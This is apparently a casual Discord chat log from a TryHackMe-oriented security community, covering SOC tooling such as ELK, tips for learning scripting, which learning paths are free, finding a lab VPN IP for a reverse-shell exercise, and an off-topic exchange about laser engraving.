I found that testing mobile apps (especially made by big companies) are pretty boring, where internal infrastructure tests reveal more critical vulns

#

Probably because it’s easier to harden one mobile app (especially that most use API’s) than to secure 20k or more hosts running multiple services

finite edge
rapid merlin
#

My gaming laptop lasts less than 2 hours is there anything I can do it was 48whr battery

simple valve
#

That's how gaming laptops work

ashen wadi
#

Why would you even get gaming laptop,build SFF PC and have one cheap thinkpad for playing with linux tipsfedora

#

BUT dont build to small one,because your cat will need warmth ❀️

past sparrow
#

only thing you need is a laptop with 1 USB-C port everything else is reduntant

loud marlin
ashen wadi
#

Stop overcomplicating stuff dudee,just learn basics and when you get job in soc ,they will show you everything.

past sparrow
#

You read out only 4 from that list? πŸ‘οΈ πŸ‘„ πŸ‘οΈ

#

ELK is acronym for 3 tools

#

But yeah, learn 1, knowledge will somewhat carry over

past sparrow
ashen wadi
#

ELK (Elasticsearch, Logstash, Kibana)

past sparrow
#

why stop at there, make it HELK!

past sparrow
#

now this can be fun

rapid merlin
ashen wadi
rapid merlin
#

My gaming laptop only lasts 2hrs

past sparrow
mint palm
#

But not in the acronym 😭

ashen wadi
#

So you are threat hunter and also digital forensic?

past sparrow
past sparrow
ashen wadi
#

Do you also have to write scripts for detection or do you have sepearate team of detection engineers for that?

past sparrow
#

but yeah, digital forensic is part of IR

past sparrow
#

if I can't find it via script I find a work around

ashen wadi
#

My friend from chicago is tier 3 analyst with 6 years of expereince,has over 100k salary and cant write scripts lol

#

He says there is whole department of guys who do just that πŸ˜„

past sparrow
#

yeah no, I like the idea of composing what I look for myself

#

if you have team doing the script writing for you, may as well replace you with combined script tool

ashen wadi
#

Do you have any tips how to start with writing scripts? My knowledge is very shallow,i can write only basic bash stuff..really basic lol

#

My plan is to learn JS/PHP but at the same time i would like to script in python and idk how to combine all that learning πŸ˜„

past sparrow
#

depends on what you really want to use the script for

#

start writing atom queries / tasks

#

and combine them over time

#

make sure atom works first, before combining

#

script doesn't need to look fancy, it just has to get the job done, online documentation is always there to help

#

If you need to deal with windows devices, then for starters can start learning PowerShell

ashen wadi
#

🫑

past sparrow
#

Just like all things, it needs practice and uh

#

things that never start take longest to finish

loud marlin
#

and was doing death note for friend

past sparrow
loud marlin
#

death note is nice for sure

ashen wadi
loud marlin
timid prism
#

cant help that im overthinker

versed prairie
#

It's probably a stupid question, but if i'm doing a reverse shell in a room over VPN how do i get my IP?

simple valve
#

You can also visit the tryhackme website and go to /access to see your IP.

versed prairie
onyx heath
#

ifconfig should do

earnest bolt
#

its my first time learning abt thsi stuff what learning path should i taek

earnest bolt
#

ty

plush mesa
#

why dont they just add that path recommendation list to the site, for example as recommendation right after signing up

shell nova
loud marlin
# shell nova Renders well on slate

app havce nice filter. Dieter. it turn color and shades of color into 255 shades of grey and auto power and speed of laser to achive effect

shell nova
#

At least for the greyscale and laser power

loud marlin
shell nova
#

How I'd have designed it

#

Better if the image is already greyscale

loud marlin
#

for that its caled bas relief picture

earnest bolt
#

btw

#

are all the paths fully free??

loud marlin
earnest bolt
#

which ones arent

loud marlin
#

some are one that you get if you subs to thm. not sure what ones are paid. you can use search tab to list them as wish

earnest bolt
#

for the most part i can get through the basics for free?

plush mesa
#

No entire paths are paid (other than the AWS one) there's always free and subscription based rooms in each path

loud marlin
earnest bolt
#

ight ty

sick lance
loud marlin
#

@shell nova also this. aside i used less power for effect. but yea. that is that auto filter

shell nova
#

Some colours translate better

loud marlin
#

yep. more range of colors are better. and depend of material

#

for b/w pictures, simple one engraving goes fast. for this slates it need 20ish min for 2k pic with around 2k mm/s. if i convert to 8k it need 45 min cca. and all also depend of LPI (same as DPI, just this is lines per inch)

shell nova
#

Aye

loud marlin
#

and it helps since is galvo laser. but down thing is is only 2w IR laser. if i get fiber galvo of 60/80/100 w i can do 3d relief on metal coins and so. which will be rly nice πŸ™‚

white nexus
#

Has anyone here looked at the AWS Cloud plan on TryHackMe? Is it worth it?

sick lance
cedar scaffold
#

id assume it also depends on if you're interested in cloud security, if so then probably yes bongocat

sick lance
#

Worth it?

Depends on your PoV, difference of opinions and all.

white nexus
cedar scaffold
#

i haven't looked at it, but going off the rest of the site, if its a topic you're interested in its probably worth

sick lance
loud marlin
sick lance
#

Tell that to all Bond villains